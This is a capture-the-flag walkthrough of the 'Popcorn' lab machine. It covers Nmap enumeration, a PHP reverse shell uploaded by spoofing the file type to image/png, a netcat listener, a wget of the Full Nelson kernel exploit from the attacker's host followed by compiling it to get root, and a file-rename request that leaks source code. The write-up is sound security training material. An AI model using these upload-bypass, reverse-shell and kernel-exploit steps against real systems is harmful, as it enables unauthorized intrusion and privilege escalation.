# Nmap 7.80 scan initiated Mon Sep 30 20:55:45 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 22,80 10.10.10.6Nmap scan report for 10.10.10.6Host is up (0.21s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)80/tcp open http Apache httpd 2.2.12 ((Ubuntu))|_http-server-header: Apache/2.2.12 (Ubuntu)|_http-title: Site doesn't have a title (text/html).Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 2.6.17 - 2.6.36 (95%), Linux 2.6.30 (95%), Linux 2.6.32 (95%), Linux 2.6.35 (95%), Android 2.3.5 (Linux 2.6) (95%), Linux 2.4.20 (Red Hat 7.2) (95%), Linux 2.6.17 (95%), Canon imageRUNNER ADVANCE C3320i or C3325 copier (94%), Epson WF-2660 printer (94%), AVM FRITZ!Box FON WLAN 7240 WAP (94%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 22/tcp)HOP RTT ADDRESS1 219.17 ms 10.10.14.12 221.41 ms 10.10.10.6OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .# Nmap done at Mon Sep 30 20:56:06 2019 -- 1 IP address (1 host up) scanned in 21.40 seconds
Only 2 ports are open and we don't have any credentials for the SSH port so the obvious choice will be to go after the web server and get all possible directory listings.
/index (Status: 200) # Nothing juicy/test (Status: 200) # PHP Test page/test.php (Status: 200) # PHP Test page/torrent (Status: 301) # PRIMARY FOCUS/rename (Status: 301) # Cool, info-leak vector
So we focus on the torrent directory and see what are we working with.
We have the option to login and signup, so we'll go ahead and signup and get an account to explore more vectors. After login we have the capability to upload a torrent file.
However, I was having trouble getting a new torrent file to upload, so I downloaded the already existing torrent file from the website and modified it using the following 2 tools, and verified if everything was fine and then was able to upload it.
After successful upload, I have an option to edit the torrent and add a screenshot to the description. This is the vector that I exploited to get RCE.
To by-pass the upload filter, all you have to do is intercept the request with burp and modify the file type to any of the image formats, I chose
image/png and my PHP shell was uploaded successfully.
Once the shell is up, we can navigate to the
/torrent/upload/ folder and lookout for a file with
.php extension and we can run it to get our reverse shell.
$ nc -lvnp 5555listening on [any] 5555 ...connect to [10.10.14.10] from (UNKNOWN) [10.10.10.6] 50548Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux20:15:47 up 5 min, 0 users, load average: 0.00, 0.00, 0.00USER TTY FROM [email protected] IDLE JCPU PCPU WHATuid=33(www-data) gid=33(www-data) groups=33(www-data)/bin/sh: can't access tty; job control turned off$ iduid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cd /home$ ls -altotal 12drwxr-xr-x 3 root root 4096 Mar 17 2017 .drwxr-xr-x 21 root root 4096 Sep 30 18:58 ..drwxr-xr-x 3 george george 4096 Mar 17 2017 george$ cd george$ ls -latotal 872drwxr-xr-x 3 george george 4096 Mar 17 2017 .drwxr-xr-x 3 root root 4096 Mar 17 2017 ..-rw------- 1 root root 2769 May 5 2017 .bash_history-rw-r--r-- 1 george george 220 Mar 17 2017 .bash_logout-rw-r--r-- 1 george george 3180 Mar 17 2017 .bashrcdrwxr-xr-x 2 george george 4096 Mar 17 2017 .cache-rw------- 1 root root 1571 Mar 17 2017 .mysql_history-rw------- 1 root root 19 May 5 2017 .nano_history-rw-r--r-- 1 george george 675 Mar 17 2017 .profile-rw-r--r-- 1 george george 0 Mar 17 2017 .sudo_as_admin_successful-rw-r--r-- 1 george george 848727 Mar 17 2017 torrenthoster.zip-rw-r--r-- 1 george george 33 Mar 17 2017 user.txt$ cat user.txt5e36a***
I ran Linux Smart Enumeration scripts and tried some manual intervention as well, however there was nothing left than to exploit the kernel itself, as it was pretty old Ubuntu 9.10. So I went with Full Nelson.
[email protected]:/tmp$ wget http://10.10.14.10/fn.cwget http://10.10.14.10/fn.c--2019-09-30 20:23:57-- http://10.10.14.10/fn.cConnecting to 10.10.14.10:80... connected.HTTP request sent, awaiting response... 200 OKLength: 9487 (9.3K) [text/plain]Saving to: `fn.c'100%[======================================>] 9,487 40.1K/s in 0.2s2019-09-30 20:23:57 (40.1 KB/s) - `fn.c' saved [9487/9487][email protected]:/tmp$ gcc fn.c -o fngcc fn.c -o fn[email protected]:/tmp$ ./fn./fn[*] Resolving kernel addresses...[+] Resolved econet_ioctl to 0xf840a280[+] Resolved econet_ops to 0xf840a360[+] Resolved commit_creds to 0xc01645d0[+] Resolved prepare_kernel_cred to 0xc01647d0[*] Calculating target...[*] Triggering payload...[*] Got root!# ididuid=0(root) gid=0(root)# cat /root/root.txtcat /root/root.txtf1223***#
Kernel exploits are not at all pretty, they are very unstable and makes life difficult. I had to reset the box 2-3 times before I got a working kernel exploit that popped the shell. So try to refrain from these as much as possible.
Another cool thing that I came across was the
/rename page, that had some very interesting output. I saw no other writeup mention this, I am not sure of the reason but this vector potentially renders the whole torrent and bypassing it very easy.
Using this API we can leak all the source code of the
/torrent or any other file for that matter.
# Requesthttp://10.10.10.6/rename/index.php?filename=/var/www/torrent/index.php&newfilename=/var/www/test.txt# Checkout test.txt file and we'll have index.php source-code.
And once the index file is moved from the torrent folder, whole folder becomes a huge index and you can use this to get source of all the files.
However, do note, to reverse the rename API effect by switching the parameters after each use, as not doing this will move out all the files and you'll be left with a non-working machine state and the final option will be to reset the box to get it working back again.